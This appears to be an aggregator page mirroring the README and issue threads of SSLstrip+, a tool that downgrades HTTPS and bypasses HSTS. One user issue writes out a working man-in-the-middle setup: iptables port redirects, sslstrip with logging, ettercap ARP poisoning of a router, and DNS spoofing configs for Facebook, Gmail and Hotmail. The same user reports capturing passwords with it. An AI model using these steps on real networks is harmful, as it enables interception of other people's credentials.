Giter Club home page Giter Club logo

sslstrip2's Introduction

SSLstrip+

This is just a mirror of the original SSLstrip+ code by Leonardo Nve, which had to be taken down because of a gag order.

For this to work you also need a DNS server that reverses the changes made by the proxy, you can find it at https://github.com/singe/dns2proxy

Description

This is a new version of [Moxie´s SSLstrip] (http://www.thoughtcrime.org/software/sslstrip/) with the new feature to avoid HTTP Strict Transport Security (HSTS) protection mechanism.

This version changes HTTPS to HTTP as the original one plus the hostname at html code to avoid HSTS. Check my slides at BlackHat ASIA 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) for more information.

Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48

sslstrip2's People

Contributors

byt3bl33d3r avatar leonardonve avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

sslstrip2's Issues

Files have special permissions and more..

When ever I attempt to run the "setup.py" script it keeps showing a error message saying that I do not have permission as root to execute the script. Also with me having changing the permissions to "Allow executing file as program" to on it then errors out saying "syntax errors" within the terminal. And by the way I am using kali linux 2016.1, I hope that no one else has this issue.

Impossible to run with Python2 anymore

Kali throws all kinds of errors when trying to install the requirements.

I have even translated the syntax to Python3 and got it running... but its throws more errors while handling requests. There is more wrong than the old syntax.

We need a Python3 implementation.

Sslstrip doesnt work with dns2proxy_hsts ?

i downloaded the sslstrip2 and dns2proxy ...
i enabled forward my ip ... and
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python sslstrip.py -l 8080 -p -w log.txt
./ia.sh router ip router ip (i want to capture packets of router )
ettercap -Tqi wlan0 -M ARP:remote /router ip// (which is my windows 10 and kali is on the same computer with VMware )
Dns2proxy Settings
domains.cfg
.facebook.com 192.168.1.1
.gmail.com 192.168.1.1
.hotmail.com 192.168.1.1
(THIS IP IS router's ip )
spoof.cfg
www.s21sec.com 192.168.1.1
ia.sh
adminip= my localip
When i open sites without HTTPS i get username & passwords .otherwise in the screen i see
DHCP : Request IPs
DHCP : Discover
so what is the problem ? what is the wrong with them ?
questions.
q name = www.google-analytics.com
Query = www.google-analytics.com A
Adding fake IP = 192.168.2.1
Adding fake IP = 192.168.2.1
Adding real IP = 216.58.212.46
Sending response...
waiting requests.
serving a request.
Dns proxy addes router's ip ... but it doesnt help ..

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.